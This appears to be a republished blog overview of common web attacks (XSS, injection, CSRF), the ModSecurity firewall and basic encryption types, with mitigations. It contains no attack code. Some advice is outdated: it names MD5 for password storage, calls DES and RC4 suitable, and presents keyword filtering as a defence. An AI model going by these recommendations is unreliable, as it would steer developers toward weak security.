Common Web Attacks and Their Mitigation Techniques

Large‑Scale Website Architecture (Part 1) – Evolution

Large‑Scale Website Architecture (Part 2) – Architectural Patterns

Large‑Scale Website Architecture (Part 3) – Core Elements

Large‑Scale Website Architecture (Part 4) – High‑Performance Architecture

Large‑Scale Website Architecture (Part 5) – High‑Availability Architecture

Large‑Scale Website Architecture (Part 6) – Scalability Architecture

Large‑Scale Website Architecture (Part 7) – Extensibility Architecture

Since the birth of the Internet, security threats have accompanied website development, with attacks such as XSS, SQL injection, CSRF, and session hijacking constantly occurring.

1. XSS Attack

XSS (Cross‑Site Scripting) is a technique where an attacker injects malicious HTML/JavaScript into a web page, causing the victim’s browser to execute unwanted scripts.

Two common XSS types exist: reflective XSS, where the malicious script is delivered via a crafted link that the victim clicks, and stored (persistent) XSS, where the attacker submits a script that is saved in the website’s database and later served to users.

For the persistent variant, the malicious script is stored in the database and rendered as part of normal pages when users browse the site.

Sanitization

Escape special HTML characters, e.g., converting “>” to “>”.

HttpOnly

Setting the HttpOnly attribute on cookies prevents JavaScript from accessing them, reducing the risk of cookie theft.

2. Injection Attacks

Injection attacks mainly include SQL injection and OS command injection. In SQL injection, an attacker inserts malicious SQL statements into an HTTP request; the server concatenates these with legitimate queries, causing unintended execution in the database.

Beyond SQL, attackers may inject OS commands or code in other languages to achieve their goals.

Sanitization

Filter dangerous patterns such as “drop table” from input, and use parameterized queries or prepared statements to prevent SQL injection.

3. CSRF Attack

CSRF (Cross‑Site Request Forgery) tricks a victim’s browser into sending authenticated requests to a target site, exploiting the fact that browsers automatically include cookies or session tokens.

Form Token

Include a random token in each form submission; the server validates the token, preventing forged requests.

CAPTCHA

Require users to solve a CAPTCHA before submitting critical actions, ensuring a human is initiating the request.

Referer Check

Validate the HTTP Referer header to confirm the request originates from an authorized page.

4. Web Application Firewall (WAF)

ModSecurity is an open‑source WAF that can be embedded in web servers or run as a standalone service. It originally started as an Apache module and now supports Java, .NET, and Nginx.

ModSecurity separates the processing engine from the rule set. The engine handles request/response processing, while the rule set defines patterns for detecting attacks and applying defenses. This modular design allows stable engine updates while continuously evolving rule sets to address new vulnerabilities.

5. Data Encryption Techniques

To protect sensitive data, applications employ three categories of encryption: hashing (one‑way), symmetric encryption, and asymmetric encryption.

5.1 One‑Way Hashing

Hashing transforms input of arbitrary length into a fixed‑size output in a one‑way manner, making it infeasible to recover the original data. It is commonly used to store passwords securely.

Typical hash algorithms include MD5 and SHA families.

5.2 Symmetric Encryption

Both encryption and decryption use the same secret key. Common symmetric algorithms are DES, RC4, AES, etc., and they are suitable for most everyday encryption needs.

5.3 Asymmetric Encryption

Asymmetric encryption uses a pair of keys: a public key that can be shared openly and a private key kept secret. Data encrypted with the public key can only be decrypted with the private key, and vice‑versa.

RSA is a widely used asymmetric algorithm; HTTPS relies on public‑key certificates issued by trusted authorities.

Source: http://blog.csdn.net/chaofanwei/article/details/29787245

Copyright statement: Content originates from the Internet; copyright belongs to the original author. We strive to credit authors and sources; please contact us if any infringement is identified.

-END-